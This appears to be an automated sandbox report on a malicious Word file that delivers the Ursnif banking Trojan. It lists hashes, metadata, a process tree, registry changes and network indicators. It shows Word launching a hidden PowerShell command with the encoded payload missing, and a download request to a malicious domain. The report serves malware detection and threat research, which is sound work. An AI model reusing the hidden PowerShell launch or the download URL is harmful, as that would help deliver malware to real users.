Field | Value |
---|---|
File name: | aaaa.doc |
Full analysis: | https://app.any.run/tasks/341f3db3-b9a8-418b-acaf-ec5b5c555180 |
Verdict: | Malicious activity |
Threats: | Ursnif is a banking Trojan that usually infects corporate victims. It is based on older malware but has been substantially updated over the years and has become quite powerful. Today Ursnif is one of the most widespread banking Trojans in the world. |
Analysis date: | February 11, 2019, 08:48:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 31083AEdafidop9714, Subject: 44488AEd10192, Author: 84862Akylaev51476, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 29 15:16:00 2018, Last Saved Time/Date: Tue May 29 15:16:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0 |
MD5: | 02F9BBEF7FA6BFAFB083CC81D71CEE25 |
SHA1: | F358E7367E6EE58C66B95D9E134254D5B64B624D |
SHA256: | 5FA990BD08BD0F5BF01F0D0616EFB68A7E71D2377C6F6783CDAB468678C13C74 |
SSDEEP: | 1536:PMFNiTwRh8Zc5n10GF/9vU2akCTdd2C+gcwDVBCc2CPpDV:EFNiTwAZc5nOU9cNH6CBDV |
Extension | Type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Field | Value |
---|---|
CompObjUserType: | ???????? Microsoft Word 97-2003 |
CompObjUserTypeLen: | 32 |
Category: | 79831AEdafidop25112 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 9 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | 47602AEdafidop35478 |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 9 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2018:05:29 14:16:00 |
CreateDate: | 2018:05:29 14:16:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | 84862Akylaev51476 |
Subject: | 44488AEd10192 |
Title: | 31083AEdafidop9714 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\aaaa.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3836 | PowersHeLL -WinDowsTyle hidden -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe | | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Operation | Key | Name | Value |
---|---|---|---|---|---|
2960 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | \|\|/ | 7C7C2F00900B0000010000000000000000000000 |
2960 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off |
2960 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On |
2960 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | WORDFiles | 1313538069 |
2960 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1313538188 |
2960 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1313538189 |
2960 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | MTTT | 900B000058A5FDA3E6C1D40100000000 |
2960 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | $~/ | 247E2F00900B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
2960 | WINWORD.EXE | delete value | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | $~/ | 247E2F00900B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
2960 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR68DC.tmp.cvr | — | — | — |
3836 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UUZVRT8Q6PVXHOE8BK9H.temp | — | — | — |
2960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | C569802DB5849779F22174B9AB0F135F | 6C3CAD88468FE63910B07989B21F7D4FABE3C3BD098CFFAF6E32CA3A869558B7 |
3836 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
3836 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2471a6.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$aaaa.doc | pgc | 8E11931B415CA290BC0D52E97296258B | F56939F81D74976166F44AAF7FB012732D3F8AF5F437EFB340FA9971B44A91E9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3836 | PowersHeLL.exe | GET | — | 23.82.167.134:80 | http://fqwdqw4d4.com/KOR/testv.php?l=akur4.yarn | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3836 | PowersHeLL.exe | 23.82.167.134:80 | fqwdqw4d4.com | Nobis Technology Group, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
fqwdqw4d4.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3836 | PowersHeLL.exe | A Network Trojan was detected | MALWARE [PTsecurity] Possible Powershell Downloader (Ursnif) |